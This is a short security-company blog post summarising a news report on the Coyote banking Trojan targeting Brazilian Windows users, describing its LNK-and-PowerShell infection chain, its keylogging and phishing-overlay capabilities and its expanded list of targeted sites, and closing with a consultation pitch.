top of page
Betterworld Logo

Coyote Malware Surge: A New Threat to Financial Security

Writer's picture: John JordanJohn Jordan

A recent cybersecurity report reveals that Coyote malware has significantly expanded its reach, now targeting over 1,000 websites and 73 financial institutions, primarily affecting Brazilian Windows users. This banking Trojan is capable of executing various malicious activities, including keylogging and phishing, posing a serious threat to financial security.

Brazil | BetterWorld Technology

Key Takeaways

  • Coyote malware now targets 1,030 sites and 73 financial institutions.

  • The malware employs complex multi-staged infection processes.

  • It utilizes PowerShell commands to deliver its payload and evade detection.

Overview of Coyote Malware

Coyote malware, first documented by Kaspersky in early 2024, has evolved into a formidable threat, particularly for users in Brazil. The malware is designed to harvest sensitive information from a wide array of financial applications, making it a significant concern for cybersecurity experts.

Infection Process

The infection process of Coyote malware is intricate and multi-staged. It begins with a Windows Shortcut (LNK) file that executes a PowerShell command to retrieve the next stage from a remote server. This command triggers a series of actions that ultimately lead to the execution of the malicious payload.

  1. Initial Access: The LNK file is the entry point, executing a PowerShell command.

  2. Payload Delivery: The command retrieves additional scripts from a remote server.

  3. Execution: The malware establishes persistence by modifying the Windows registry, ensuring it runs on system startup.

Capabilities of Coyote Malware

Once deployed, Coyote malware can perform a variety of malicious activities, including:

  • Keylogging: Capturing keystrokes to steal sensitive information.

  • Screenshot Capture: Taking screenshots to gather user data.

  • Phishing Overlays: Displaying fake login screens to trick users into providing credentials.

The malware also gathers basic system information and checks for installed antivirus products, which helps it evade detection.

Expanded Target List

The latest iteration of Coyote malware has broadened its target list, now encompassing:

  • 1,030 Websites: Including popular platforms like mercadobitcoin.com.br and bitcointrade.com.br.

  • 73 Financial Institutions: Targeting various financial services to maximize its impact.

When a victim attempts to access any of the targeted sites, the malware communicates with an attacker-controlled server to determine the next steps, which may include capturing screenshots or activating a keylogger.

Coyote malware represents a significant threat to financial cybersecurity, particularly in Brazil. Its ability to expand its target list and employ sophisticated infection techniques makes it a formidable adversary for both users and cybersecurity professionals. As the malware landscape continues to evolve, vigilance and proactive measures are essential to safeguard sensitive information from such threats.

Cybersecurity is more crucial than ever. At BetterWorld Technology, we provide advanced solutions to tackle emerging threats while fostering innovation. Secure your business with confidence—contact us today for a consultation.

Sources

  • Coyote Malware Expands Reach: Now Targets 1,030 Sites and 73 Financial Institutions, The Hacker News.

30 views
bottom of page